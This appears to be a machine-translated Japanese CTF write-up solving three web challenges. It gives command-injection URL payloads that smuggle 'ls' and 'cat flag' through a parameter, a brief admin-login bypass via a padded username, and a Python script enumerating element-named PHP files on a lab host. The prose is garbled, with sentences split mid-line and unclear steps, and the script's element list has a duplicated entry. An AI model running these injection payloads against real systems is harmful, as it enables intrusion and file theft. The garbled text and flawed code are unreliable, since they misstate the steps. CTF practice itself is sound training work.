サインインの質問
システム関数があることがわかり
ます。Linuxでは、「;」を使用してさまざまなステートメントを分離できます。
?url=127.0.0.1;ls;1
その後:
?url=127.0.0.1;cat%20flag;1
偽の学生
ヒントを与える
トピックを入力すると
、次のように表示されます。プロンプトに従って、最初にregister.phpに登録しましょう。admin1を
入力できます
か?管理スペース1に入り、
ログインします(ここでは、スペースなしでadminを使用してログインし
ます)
。次に、管理者であり、通常の照合をバイパスします
。cを空にし、直接バイパスしてフラグを取得します。
[BJDCTF2番目] elementmaster
翻訳:私は118の要素すべてのマスターです!あなたはそれを感じないかもしれませんが、放射性光線の症状は静かにあなたを殺します。
ソースコードを見る:
IDの16進
数の2つの文字列が非常に奇妙であることがわかりました。これを変換して、0x506F2E ==>
Po。0x706870==> phpを取得します。
上記と組み合わせると、スクリプトは次のようになります。
import requests
url='http://86512ce4-2a07-43e0-a9f6-edabc83ec7d5.node3.buuoj.cn/'
flag=''
element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
for i in element:
r=requests.get(url+i+'.php')
if r.status_code == 200:
flag+=r.text
print (flag)
結果
を取得And_th3_3LemEnt5_w1LL_De5tR0y_y0u.phpフラグを取得するためのアクセス
